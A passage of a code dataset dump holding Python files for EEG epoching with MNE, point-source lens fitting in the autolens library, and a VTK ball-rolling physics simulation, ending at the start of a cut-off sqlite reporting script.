"datetime.timedelta", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "176820001", "text": "from pathlib import Path\nimport os\nimport numpy as np\nimport mne\nimport pandas as pd\n\n# get the data path (not sure this works)\nfrom data import datafolder\n# get the list function\n\nimport data.eeg\nfrom functools import partial\n\nftype = 'raw'\ntasktype = 'Video'\n\n\n# make the generators partial functions\ndef raws():\n for raw in data.eeg.raws(ftype, tasktype):\n if len(raw) > 1:\n yield raw\n elif len(raw) == 1:\n yield raw[0]\n\n\ndef events():\n for event in data.eeg.events(ftype, tasktype):\n if len(raw) > 1:\n yield event\n elif len(raw) == 1:\n yield event[0]\n\n\n# for the epochs, make a slightly more elaborate function that\n# fixes the event types and the duration\ndef epochs(**kwargs):\n\n for rawlist, eventlist in zip(\n data.eeg.raws(ftype, tasktype),\n data.eeg.events(ftype, tasktype)):\n pid = rawlist[0].info['subject_info']\n epochlist = []\n for raw, event in zip(rawlist, eventlist):\n duration = ((event[0, (event[:, 2] > 100) & (event[:, 2] < 110)] -\n event[0, (event[:, 2] > 80) & (event[:, 2] < 90)]) /\n raw.info['sfreq'])[0]\n\n epochlist.append(mne.Epochs(raw, event, event_id=[81, 82, 83, 84],\n tmax=duration, on_missing='ignore',\n **kwargs))\n\n yield mne.concatenate_epochs(epochlist)\n", "sub_path": "{{cookiecutter.project_slug}}/data/eeg/raw/video.py", "file_name": "video.py", "file_ext": "py", "file_size_in_byte": 1467, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "data.eeg.raws", "line_number": 20, "usage_type": "call"}, {"api_name": "data.eeg", "line_number": 20, "usage_type": "attribute"}, {"api_name": "data.eeg.events", "line_number": 28, "usage_type": "call"}, {"api_name": "data.eeg", "line_number": 28, "usage_type": "attribute"}, {"api_name": "data.eeg.raws", "line_number": 40, "usage_type": "call"}, {"api_name": "data.eeg", "line_number": 40, "usage_type": "attribute"}, {"api_name": "data.eeg.events", "line_number": 41, "usage_type": "call"}, {"api_name": "data.eeg", "line_number": 41, "usage_type": "attribute"}, {"api_name": "mne.Epochs", "line_number": 49, "usage_type": "call"}, {"api_name": "mne.concatenate_epochs", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "385384684", "text": "from functools import partial\r\nimport numba\r\nfrom typing import Optional\r\n\r\nimport autoarray as aa\r\nimport autogalaxy as ag\r\n\r\nfrom autolens.point.point_dataset import PointDict\r\nfrom autolens.point.point_dataset import PointDataset\r\nfrom autolens.point.point_solver import PointSolver\r\nfrom autolens.lens.ray_tracing import Tracer\r\n\r\nfrom autolens import exc\r\n\r\n\r\nclass FitPointDict(dict):\r\n def __init__(\r\n self, point_dict: PointDict, tracer: Tracer, point_solver: PointSolver\r\n ):\r\n \"\"\"\r\n A fit to a point source dataset, which is stored as a dictionary containing the fit of every data point in a\r\n entire point-source dataset dictionary.\r\n\r\n This dictionary uses the `name` of the `PointDataset` to act as the key of every entry of the dictionary,\r\n making it straight forward to access the attributes based on the dataset name.\r\n\r\n Parameters\r\n ----------\r\n point_dict\r\n A dictionary of all point-source datasets that are to be fitted.\r\n\r\n Returns\r\n -------\r\n Dict\r\n A dictionary where the keys are the `name` entries of each dataset in the `PointDict` and the values\r\n are the corresponding fits to the `PointDataset` it contained.\r\n \"\"\"\r\n\r\n self.tracer = tracer\r\n\r\n super().__init__()\r\n\r\n for key, point_dataset in point_dict.items():\r\n\r\n self[key] = FitPointDataset(\r\n point_dataset=point_dataset, tracer=tracer, point_solver=point_solver\r\n )\r\n\r\n @property\r\n def log_likelihood(self) -> float:\r\n return sum(fit.log_likelihood for fit in self.values())\r\n\r\n\r\nclass FitPointDataset:\r\n def __init__(\r\n self, point_dataset: PointDataset, tracer: Tracer, point_solver: PointSolver\r\n ):\r\n\r\n self.point_dataset = point_dataset\r\n\r\n point_profile = tracer.extract_profile(profile_name=point_dataset.name)\r\n\r\n try:\r\n\r\n if isinstance(point_profile, ag.ps.PointSourceChi):\r\n\r\n self.positions = FitPositionsSource(\r\n name=point_dataset.name,\r\n positions=point_dataset.positions,\r\n noise_map=point_dataset.positions_noise_map,\r\n tracer=tracer,\r\n point_profile=point_profile,\r\n )\r\n\r\n else:\r\n\r\n self.positions = FitPositionsImage(\r\n name=point_dataset.name,\r\n positions=point_dataset.positions,\r\n noise_map=point_dataset.positions_noise_map,\r\n point_solver=point_solver,\r\n tracer=tracer,\r\n point_profile=point_profile,\r\n )\r\n\r\n except exc.PointExtractionException:\r\n self.positions = None\r\n except (AttributeError, numba.errors.TypingError) as e:\r\n raise exc.FitException from e\r\n\r\n try:\r\n\r\n self.flux = FitFluxes(\r\n name=point_dataset.name,\r\n fluxes=point_dataset.fluxes,\r\n noise_map=point_dataset.fluxes_noise_map,\r\n positions=point_dataset.positions,\r\n tracer=tracer,\r\n )\r\n\r\n except exc.PointExtractionException:\r\n\r\n self.flux = None\r\n\r\n @property\r\n def log_likelihood(self) -> float:\r\n\r\n log_likelihood_positions = (\r\n self.positions.log_likelihood if self.positions is not None else 0.0\r\n )\r\n log_likelihood_flux = self.flux.log_likelihood if self.flux is not None else 0.0\r\n\r\n return log_likelihood_positions + log_likelihood_flux\r\n\r\n\r\nclass FitPositionsImage(aa.FitData):\r\n def __init__(\r\n self,\r\n name: str,\r\n positions: aa.Grid2DIrregular,\r\n noise_map: aa.ValuesIrregular,\r\n tracer: Tracer,\r\n point_solver: PointSolver,\r\n point_profile: Optional[ag.ps.Point] = None,\r\n ):\r\n \"\"\"\r\n A lens position fitter, which takes a set of positions (e.g. from a plane in the tracer) and computes \\\r\n their maximum separation, such that points which tracer closer to one another have a higher log_likelihood.\r\n\r\n Parameters\r\n -----------\r\n positions : Grid2DIrregular\r\n The (y,x) arc-second coordinates of positions which the maximum distance and log_likelihood is computed using.\r\n noise_value\r\n The noise-value assumed when computing the log likelihood.\r\n \"\"\"\r\n\r\n self.name = name\r\n\r\n if point_profile is None:\r\n point_profile = tracer.extract_profile(profile_name=name)\r\n\r\n self.point_profile = point_profile\r\n\r\n self.point_solver = point_solver\r\n\r\n if self.point_profile is None:\r\n raise exc.PointExtractionException(\r\n f\"For the point-source named {name} there was no matching point source profile \"\r\n f\"in the tracer (make sure your tracer's point source name is the same the dataset name.\"\r\n )\r\n\r\n self.source_plane_coordinate = self.point_profile.centre\r\n\r\n if len(tracer.planes) > 2:\r\n upper_plane_index = tracer.extract_plane_index_of_profile(profile_name=name)\r\n else:\r\n upper_plane_index = None\r\n\r\n model_positions = point_solver.solve(\r\n lensing_obj=tracer,\r\n source_plane_coordinate=self.source_plane_coordinate,\r\n upper_plane_index=upper_plane_index,\r\n )\r\n\r\n model_positions = model_positions.grid_of_closest_from(grid_pair=positions)\r\n\r\n super().__init__(\r\n data=positions,\r\n noise_map=noise_map,\r\n model_data=model_positions,\r\n mask=None,\r\n inversion=None,\r\n )\r\n\r\n @property\r\n def positions(self) -> aa.Grid2DIrregular:\r\n return self.data\r\n\r\n @property\r\n def model_positions(self) -> aa.Grid2DIrregular:\r\n return self.model_data\r\n\r\n @property\r\n def residual_map(self) -> aa.ValuesIrregular:\r\n\r\n residual_positions = self.positions - self.model_positions\r\n\r\n return residual_positions.distances_to_coordinate(coordinate=(0.0, 0.0))\r\n\r\n\r\nclass FitPositionsSource(aa.FitData):\r\n def __init__(\r\n self,\r\n name: str,\r\n positions: aa.Grid2DIrregular,\r\n noise_map: aa.ValuesIrregular,\r\n tracer: Tracer,\r\n point_profile: Optional[ag.ps.Point] = None,\r\n ):\r\n \"\"\"\r\n A lens position fitter, which takes a set of positions (e.g. from a plane in the tracer) and computes \\\r\n their maximum separation, such that points which tracer closer to one another have a higher log_likelihood.\r\n\r\n Parameters\r\n -----------\r\n positions : Grid2DIrregular\r\n The (y,x) arc-second coordinates of positions which the maximum distance and log_likelihood is computed using.\r\n noise_value\r\n The noise-value assumed when computing the log likelihood.\r\n \"\"\"\r\n\r\n self.name = name\r\n\r\n if point_profile is None:\r\n point_profile = tracer.extract_profile(profile_name=name)\r\n\r\n self.point_profile = point_profile\r\n\r\n if self.point_profile is None:\r\n raise exc.PointExtractionException(\r\n f\"For the point-source named {name} there was no matching point source profile \"\r\n f\"in the tracer (make sure your tracer's point source name is the same the dataset name.\"\r\n )\r\n\r\n self.source_plane_coordinate = self.point_profile.centre\r\n\r\n if len(tracer.planes) <= 2:\r\n\r\n deflections = tracer.deflections_yx_2d_from(grid=positions)\r\n\r\n else:\r\n\r\n upper_plane_index = tracer.extract_plane_index_of_profile(profile_name=name)\r\n\r\n deflections = tracer.deflections_between_planes_from(\r\n grid=positions, plane_i=0, plane_j=upper_plane_index\r\n )\r\n\r\n model_positions = positions.grid_via_deflection_grid_from(\r\n deflection_grid=deflections\r\n )\r\n\r\n super().__init__(\r\n data=positions,\r\n noise_map=noise_map,\r\n model_data=model_positions,\r\n mask=None,\r\n inversion=None,\r\n )\r\n\r\n @property\r\n def positions(self) -> aa.Grid2DIrregular:\r\n return self.data\r\n\r\n @property\r\n def model_positions(self) -> aa.Grid2DIrregular:\r\n return self.model_data\r\n\r\n @property\r\n def residual_map(self) -> aa.ValuesIrregular:\r\n\r\n return self.model_positions.distances_to_coordinate(\r\n coordinate=self.source_plane_coordinate\r\n )\r\n\r\n\r\nclass FitFluxes(aa.FitData):\r\n def __init__(\r\n self,\r\n name: str,\r\n fluxes: aa.ValuesIrregular,\r\n noise_map: aa.ValuesIrregular,\r\n positions: aa.Grid2DIrregular,\r\n tracer: Tracer,\r\n point_profile: Optional[ag.ps.Point] = None,\r\n ):\r\n\r\n self.tracer = tracer\r\n\r\n self.name = name\r\n self.positions = positions\r\n\r\n if point_profile is None:\r\n point_profile = tracer.extract_profile(profile_name=name)\r\n\r\n self.point_profile = point_profile\r\n\r\n if self.point_profile is None:\r\n raise exc.PointExtractionException(\r\n f\"For the point-source named {name} there was no matching point source profile \"\r\n f\"in the tracer (make sure your tracer's point source name is the same the dataset name.\"\r\n )\r\n\r\n elif not hasattr(self.point_profile, \"flux\"):\r\n raise exc.PointExtractionException(\r\n f\"For the point-source named {name} the extracted point source was the \"\r\n f\"class {self.point_profile.__class__.__name__} and therefore does \"\r\n f\"not contain a flux component.\"\r\n )\r\n\r\n if len(tracer.planes) > 2:\r\n upper_plane_index = tracer.extract_plane_index_of_profile(profile_name=name)\r\n deflections_func = partial(\r\n tracer.deflections_between_planes_from,\r\n plane_i=0,\r\n plane_j=upper_plane_index,\r\n )\r\n else:\r\n deflections_func = tracer.deflections_yx_2d_from\r\n\r\n self.magnifications = abs(\r\n self.tracer.magnification_2d_via_hessian_from(\r\n grid=positions, deflections_func=deflections_func\r\n )\r\n )\r\n\r\n model_fluxes = aa.ValuesIrregular(\r\n values=[\r\n magnification * self.point_profile.flux\r\n for magnification in self.magnifications\r\n ]\r\n )\r\n\r\n super().__init__(\r\n data=fluxes,\r\n noise_map=noise_map,\r\n model_data=model_fluxes,\r\n mask=None,\r\n inversion=None,\r\n )\r\n\r\n @property\r\n def fluxes(self) -> aa.ValuesIrregular:\r\n return self.data\r\n\r\n @property\r\n def model_fluxes(self) -> aa.ValuesIrregular:\r\n return self.model_data\r\n\r\n\r\nclass AbstractFitPositionsSourcePlane:\r\n def __init__(\r\n self,\r\n positions: aa.Grid2DIrregular,\r\n noise_map: aa.ValuesIrregular,\r\n tracer: Tracer,\r\n ):\r\n \"\"\"\r\n Given a positions dataset, which is a list of positions with names that associated them to model source\r\n galaxies, use a `Tracer` to determine the traced coordinate positions in the source-plane.\r\n\r\n Different children of this abstract class are available which use the traced coordinates to define a chi-squared\r\n value in different ways.\r\n\r\n Parameters\r\n -----------\r\n positions : Grid2DIrregular\r\n The (y,x) arc-second coordinates of named positions which the log_likelihood is computed using. Positions\r\n are paired to galaxies in the `Tracer` using their names.\r\n tracer : Tracer\r\n The object that defines the ray-tracing of the strong lens system of galaxies.\r\n noise_value\r\n The noise-value assumed when computing the log likelihood.\r\n \"\"\"\r\n self.positions = positions\r\n self.noise_map = noise_map\r\n self.source_plane_positions = tracer.traced_grid_list_from(grid=positions)[-1]\r\n\r\n @property\r\n def furthest_separations_of_source_plane_positions(self) -> aa.ValuesIrregular:\r\n \"\"\"\r\n Returns the furthest distance of every source-plane (y,x) coordinate to the other source-plane (y,x)\r\n coordinates.\r\n\r\n For example, for the following source-plane positions:\r\n\r\n source_plane_positions = [[(0.0, 0.0), (0.0, 1.0), (0.0, 3.0)]\r\n\r\n The returned furthest distances are:\r\n\r\n source_plane_positions = [3.0, 2.0, 3.0]\r\n\r\n Returns\r\n -------\r\n aa.ValuesIrregular\r\n The further distances of every set of grouped source-plane coordinates the other source-plane coordinates\r\n that it is grouped with.\r\n \"\"\"\r\n return self.source_plane_positions.furthest_distances_to_other_coordinates\r\n\r\n @property\r\n def max_separation_of_source_plane_positions(self) -> float:\r\n return max(self.furthest_separations_of_source_plane_positions)\r\n\r\n def max_separation_within_threshold(self, threshold) -> bool:\r\n return self.max_separation_of_source_plane_positions <= threshold\r\n\r\n\r\nclass FitPositionsSourceMaxSeparation(AbstractFitPositionsSourcePlane):\r\n def __init__(\r\n self,\r\n positions: aa.Grid2DIrregular,\r\n noise_map: Optional[aa.ValuesIrregular],\r\n tracer: Tracer,\r\n ):\r\n \"\"\"A lens position fitter, which takes a set of positions (e.g. from a plane in the tracer) and computes \\\r\n their maximum separation, such that points which tracer closer to one another have a higher log_likelihood.\r\n\r\n Parameters\r\n -----------\r\n positions : Grid2DIrregular\r\n The (y,x) arc-second coordinates of positions which the maximum distance and log_likelihood is computed using.\r\n noise_value\r\n The noise-value assumed when computing the log likelihood.\r\n \"\"\"\r\n super().__init__(positions=positions, noise_map=noise_map, tracer=tracer)\r\n", "sub_path": "autolens/point/fit_point.py", "file_name": "fit_point.py", "file_ext": "py", "file_size_in_byte": 14233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "autolens.point.point_dataset.PointDict", "line_number": 18, "usage_type": "name"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 18, "usage_type": "name"}, {"api_name": "autolens.point.point_solver.PointSolver", "line_number": 18, "usage_type": "name"}, {"api_name": "autolens.point.point_dataset.PointDataset", "line_number": 56, "usage_type": "name"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 56, "usage_type": "name"}, {"api_name": "autolens.point.point_solver.PointSolver", "line_number": 56, "usage_type": "name"}, {"api_name": "autogalaxy.ps", "line_number": 65, "usage_type": "attribute"}, {"api_name": "autolens.exc.PointExtractionException", "line_number": 86, "usage_type": "attribute"}, {"api_name": "autolens.exc", "line_number": 86, "usage_type": "name"}, {"api_name": "numba.errors", "line_number": 88, "usage_type": "attribute"}, {"api_name": "autolens.exc.FitException", "line_number": 89, "usage_type": "attribute"}, {"api_name": "autolens.exc", "line_number": 89, "usage_type": "name"}, {"api_name": "autolens.exc.PointExtractionException", "line_number": 101, "usage_type": "attribute"}, {"api_name": "autolens.exc", "line_number": 101, "usage_type": "name"}, {"api_name": "autoarray.FitData", "line_number": 116, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 120, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 121, "usage_type": "attribute"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 122, "usage_type": "name"}, {"api_name": "autolens.point.point_solver.PointSolver", "line_number": 123, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 124, "usage_type": "name"}, {"api_name": "autogalaxy.ps", "line_number": 124, "usage_type": "attribute"}, {"api_name": "autolens.exc.PointExtractionException", "line_number": 148, "usage_type": "call"}, {"api_name": "autolens.exc", "line_number": 148, "usage_type": "name"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 177, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 181, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 185, "usage_type": "attribute"}, {"api_name": "autoarray.FitData", "line_number": 192, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 196, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 197, "usage_type": "attribute"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 198, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 199, "usage_type": "name"}, {"api_name": "autogalaxy.ps", "line_number": 199, "usage_type": "attribute"}, {"api_name": "autolens.exc.PointExtractionException", "line_number": 221, "usage_type": "call"}, {"api_name": "autolens.exc", "line_number": 221, "usage_type": "name"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 253, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 257, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 261, "usage_type": "attribute"}, {"api_name": "autoarray.FitData", "line_number": 268, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 272, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 273, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 274, "usage_type": "attribute"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 275, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 276, "usage_type": "name"}, {"api_name": "autogalaxy.ps", "line_number": 276, "usage_type": "attribute"}, {"api_name": "autolens.exc.PointExtractionException", "line_number": 290, "usage_type": "call"}, {"api_name": "autolens.exc", "line_number": 290, "usage_type": "name"}, {"api_name": "autolens.exc.PointExtractionException", "line_number": 296, "usage_type": "call"}, {"api_name": "autolens.exc", "line_number": 296, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 304, "usage_type": "call"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 318, "usage_type": "call"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 334, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 338, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 345, "usage_type": "attribute"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 346, "usage_type": "attribute"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 347, "usage_type": "name"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 371, "usage_type": "attribute"}, {"api_name": "autoarray.Grid2DIrregular", "line_number": 403, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 404, "usage_type": "name"}, {"api_name": "autoarray.ValuesIrregular", "line_number": 404, "usage_type": "attribute"}, {"api_name": "autolens.lens.ray_tracing.Tracer", "line_number": 405, "usage_type": "name"}]} +{"seq_id": "575193062", "text": "import vtk\n\nradio=60\n\nclass vtkTimerCallback():\n def __init__(self, tiempo_simulado, actor, iren, posX,velX,posY,velY,reb,rugos):\n self.ubicaX = posX\n self.ubicaY = posY\n self.tiempo_simulado = tiempo_simulado\n self.actor = actor\n self.iren = iren\n self.timerId = None\n self.velocidadX=velX\n self.velocidadY=velY\n self.rebote=reb\n self.rugosidad=rugos\n\n def execute(self, obj, event):\n tiempo = 0\n while tiempo < self.tiempo_simulado:\n self.actor.SetPosition(self.ubicaX, radio,self.ubicaY)\n print(\"tiempo \"+str(tiempo)+\" \"+str(self.actor.GetPosition()))\n print(\" \"+str(self.velocidadX)+\" \"+str(self.velocidadY))\n tiempo += 0.001\n iren = obj\n self.actor.RotateZ(0.5)\n self.actor.RotateX(0.5*(self.velocidadX)/(self.velocidadX+self.velocidadY))\n self.actor.RotateY(0.5*(self.velocidadY)/(self.velocidadX+self.velocidadY))\n\n iren.GetRenderWindow().Render()\n\n if self.actor.GetPosition()[0]>1350 or self.actor.GetPosition()[0]<-1350:\n self.velocidadX= self.velocidadX*-1*self.rebote\n\n if self.actor.GetPosition()[2]>1350 or self.actor.GetPosition()[2]<-1350: \n self.velocidadY= self.velocidadY*-1*self.rebote \n\n if self.velocidadX>0: \n self.ubicaX = self.ubicaX + self.velocidadX*tiempo - 4.9*self.rugosidad*tiempo*tiempo\n if self.velocidadX > 9.8*self.rugosidad*tiempo:\n self.velocidadX= self.velocidadX - 9.8*self.rugosidad*tiempo\n else:\n self.velocidadX=0\n else:\n self.ubicaX = self.ubicaX + self.velocidadX*tiempo + 4.9*self.rugosidad*tiempo*tiempo\n if -1*self.velocidadX > 9.8*self.rugosidad*tiempo:\n self.velocidadX= self.velocidadX + 9.8*self.rugosidad*tiempo\n else:\n self.velocidadX=0\n\n if self.velocidadY>0: \n self.ubicaY = self.ubicaY + self.velocidadY*tiempo - 4.9*self.rugosidad*tiempo*tiempo\n if self.velocidadY > 9.8*self.rugosidad*tiempo:\n self.velocidadY= self.velocidadY - 9.8*self.rugosidad*tiempo\n else:\n self.velocidadY=0\n else:\n self.ubicaY = self.ubicaY + self.velocidadY*tiempo + 4.9*self.rugosidad*tiempo*tiempo\n self.velocidadY= self.velocidadY+ 9.8*self.rugosidad*tiempo\n if -1*self.velocidadY > 9.8*self.rugosidad*tiempo:\n self.velocidadY= self.velocidadY + 9.8*self.rugosidad*tiempo\n else:\n self.velocidadY=0\n\n if abs(self.velocidadY)<0.005 and abs(self.velocidadX)<0.005:\n break\n\n if self.timerId:\n iren.DestroyTimer(self.timerId)\n\n\ndef main():\n colors = vtk.vtkNamedColors()\n\n jpgfile = \"texture_bola.jpg\"\n\n reader = vtk.vtkJPEGReader()\n reader.SetFileName(jpgfile)\n\n # Create a sphere\n \n sphereSource = vtk.vtkSphereSource()\n sphereSource.SetCenter(0.0, 0.0, 0.0)\n sphereSource.SetRadius(radio)\n sphereSource.SetPhiResolution(300)\n sphereSource.SetThetaResolution(300)\n\n # Create a pared1\n pared1 = vtk.vtkCubeSource()\n pared1.SetXLength(3100)\n pared1.SetYLength(250)\n pared1.SetZLength(100)\n pared1.Update()\n\n # Create a pared1\n pared2 = vtk.vtkCubeSource()\n pared2.SetXLength(3100)\n pared2.SetYLength(250)\n pared2.SetZLength(100)\n pared2.Update()\n\n # Create a pared1\n pared3 = vtk.vtkCubeSource()\n pared3.SetXLength(100)\n pared3.SetYLength(250)\n pared3.SetZLength(3100)\n pared3.Update()\n\n # Create a pared1\n pared4 = vtk.vtkCubeSource()\n pared4.SetXLength(100)\n pared4.SetYLength(250)\n pared4.SetZLength(3100)\n pared4.Update()\n\n # Create a pared1\n pared5 = vtk.vtkCubeSource()\n pared5.SetXLength(3000)\n pared5.SetYLength(radio/2)\n pared5.SetZLength(3000)\n pared5.Update()\n\n texture = vtk.vtkTexture()\n texture.SetInputConnection(reader.GetOutputPort())\n\n map_to_sphere = vtk.vtkTextureMapToSphere()\n map_to_sphere.SetInputConnection(sphereSource.GetOutputPort())\n\n # Create a mapper and actor\n mapper1 = vtk.vtkPolyDataMapper()\n mapper1.SetInputConnection(map_to_sphere.GetOutputPort())\n\n # Create mapper\n mapper2 = vtk.vtkPolyDataMapper()\n mapper2.SetInputData(pared1.GetOutput())\n\n # Create mapper\n mapper3 = vtk.vtkPolyDataMapper()\n mapper3.SetInputData(pared2.GetOutput())\n\n # Create mapper\n mapper4 = vtk.vtkPolyDataMapper()\n mapper4.SetInputData(pared3.GetOutput())\n\n # Create mapper\n mapper5 = vtk.vtkPolyDataMapper()\n mapper5.SetInputData(pared4.GetOutput())\n\n # Create mapper\n mapper6 = vtk.vtkPolyDataMapper()\n mapper6.SetInputData(pared5.GetOutput())\n\n actor1 = vtk.vtkActor()\n #actor1.GetProperty().SetColor(colors.GetColor3d(\"Peacock\"))\n actor1.GetProperty().SetSpecular(0.6)\n actor1.GetProperty().SetSpecularPower(30)\n actor1.SetPosition(0,radio,0)\n actor1.SetMapper(mapper1)\n actor1.SetTexture(texture)\n\n actor2 = vtk.vtkActor()\n actor2.SetMapper(mapper2)\n actor2.GetProperty().SetColor(173/255, 114/255, 4/255)\n actor2.SetPosition(0,0,-1500)\n\n actor3 = vtk.vtkActor()\n actor3.SetMapper(mapper3)\n actor3.GetProperty().SetColor(173/255, 114/255, 4/255)\n actor3.SetPosition(0,0,1500)\n\n actor4 = vtk.vtkActor()\n actor4.SetMapper(mapper4)\n actor4.GetProperty().SetColor(173/255, 114/255, 4/255)\n actor4.SetPosition(-1500,0,0)\n\n actor5 = vtk.vtkActor()\n actor5.SetMapper(mapper5)\n actor5.GetProperty().SetColor(173/255, 114/255, 4/255)\n actor5.SetPosition(1500,0,0)\n\n actor6 = vtk.vtkActor()\n actor6.SetMapper(mapper6)\n actor6.GetProperty().SetColor(24/255, 173/255, 4/255)\n actor6.SetPosition(0,-radio/2,0)\n\n # Setup a renderer, render window, and interactor\n renderer = vtk.vtkRenderer()\n renderer.SetBackground(colors.GetColor3d(\"Black\"))\n renderWindow = vtk.vtkRenderWindow()\n renderWindow.SetWindowName(\"Tarea 2\")\n renderWindow.SetSize(1600, 900)\n renderWindow.AddRenderer(renderer)\n\n renderWindowInteractor = vtk.vtkRenderWindowInteractor()\n renderWindowInteractor.SetRenderWindow(renderWindow)\n\n # Add the actor to the scene\n renderer.AddActor(actor1)\n renderer.AddActor(actor2)\n renderer.AddActor(actor3)\n renderer.AddActor(actor4)\n renderer.AddActor(actor5)\n renderer.AddActor(actor6)\n\n # Render and interact\n renderWindow.Render()\n renderer.GetActiveCamera().Zoom(1)\n renderWindow.Render()\n renderer.GetActiveCamera().SetPosition(2000,7000,7000)\n renderWindow.Render()\n\n # Initialize must be called prior to creating timer events.\n renderWindowInteractor.Initialize()\n\n # Sign up to receive TimerEvent\n #tiempo_simulado, actor, window, posicionX, velocidadX, posicionY, velocidadY, rebote ,rugosidad\n cb = vtkTimerCallback(3000, actor1, renderWindowInteractor,0,1,0,2,0.99,0.002)\n renderWindowInteractor.AddObserver('TimerEvent', cb.execute)\n cb.timerId = renderWindowInteractor.CreateRepeatingTimer(500)\n\n # start the interaction and timer\n renderWindow.Render()\n renderWindowInteractor.Start()\n\nmain()\n", "sub_path": "Practica2/ej1FISICA2.py", "file_name": "ej1FISICA2.py", "file_ext": "py", "file_size_in_byte": 7417, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "vtk.vtkNamedColors", "line_number": 73, "usage_type": "call"}, {"api_name": "vtk.vtkJPEGReader", "line_number": 77, "usage_type": "call"}, {"api_name": "vtk.vtkSphereSource", "line_number": 82, "usage_type": "call"}, {"api_name": "vtk.vtkCubeSource", "line_number": 89, "usage_type": "call"}, {"api_name": "vtk.vtkCubeSource", "line_number": 96, "usage_type": "call"}, {"api_name": "vtk.vtkCubeSource", "line_number": 103, "usage_type": "call"}, {"api_name": "vtk.vtkCubeSource", "line_number": 110, "usage_type": "call"}, {"api_name": "vtk.vtkCubeSource", "line_number": 117, "usage_type": "call"}, {"api_name": "vtk.vtkTexture", "line_number": 123, "usage_type": "call"}, {"api_name": "vtk.vtkTextureMapToSphere", "line_number": 126, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 130, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 134, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 138, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 142, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 146, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 150, "usage_type": "call"}, {"api_name": "vtk.vtkActor", "line_number": 153, "usage_type": "call"}, {"api_name": "vtk.vtkActor", "line_number": 161, "usage_type": "call"}, {"api_name": "vtk.vtkActor", "line_number": 166, "usage_type": "call"}, {"api_name": "vtk.vtkActor", "line_number": 171, "usage_type": "call"}, {"api_name": "vtk.vtkActor", "line_number": 176, "usage_type": "call"}, {"api_name": "vtk.vtkActor", "line_number": 181, "usage_type": "call"}, {"api_name": "vtk.vtkRenderer", "line_number": 187, "usage_type": "call"}, {"api_name": "vtk.vtkRenderWindow", "line_number": 189, "usage_type": "call"}, {"api_name": "vtk.vtkRenderWindowInteractor", "line_number": 194, "usage_type": "call"}]} +{"seq_id": "174021117", "text": "#!coding: utf-8\n__author__ = 'n-bar'\n\nimport os\nimport sys\nimport sqlite3\nimport argparse\nimport xlsxwriter\nimport logging\n\nfrom glob import glob\n\nlogger = logging.getLogger(__name__)\n\n# все новые поля и варианты их написания можно добавлять сюда\nfld_type = {'Month': [u'TEXT', u'Month'],\n 'ShortMonth': [u'TEXT', u'Month'],\n 'Client': [u'TEXT', u'Client'],\n 'Domain': [u'TEXT', u'Client'],\n 'CustomCategory': [u'TEXT', u'CustomCategory'],\n 'BannerCategory': [u'TEXT', u'CustomCategory'],\n 'Region': [u'TEXT', u'Region'],\n 'Direct_Shows': [u'INTEGER DEFAULT 0', u'Direct_Shows'],\n 'Direct_Clicks': [u'INTEGER DEFAULT 0', u'Direct_Clicks'],\n 'Direct_Cost': [u'REAL DEFAULT 0.0', u'Direct_Cost'],\n 'RSYA_Shows': [u'INTEGER DEFAULT 0', u'RSYA_Shows'],\n 'RSYA_Clicks': [u'INTEGER DEFAULT 0', u'RSYA_Clicks'],\n 'RSYA_Cost': [u'REAL DEFAULT 0.0', u'RSYA_Cost'],\n 'Shows': [u'INTEGER DEFAULT 0', u'Shows'],\n 'Clicks': [u'INTEGER DEFAULT 0', u'Clicks'],\n 'Cost': [u'REAL DEFAULT 0.0', u'Cost'],\n 'Qvartal': [u'TEXT', u'Qvartal'],\n 'Client_Type': [u'TEXT', u'Client_Type'],\n 'Region_Type': [u'TEXT', u'Region_Type'],\n 'CompCount': [u'INTEGER DEFAULT 0', u'CompCount'],\n 'Region:str': [u'TEXT', u'Region'],\n 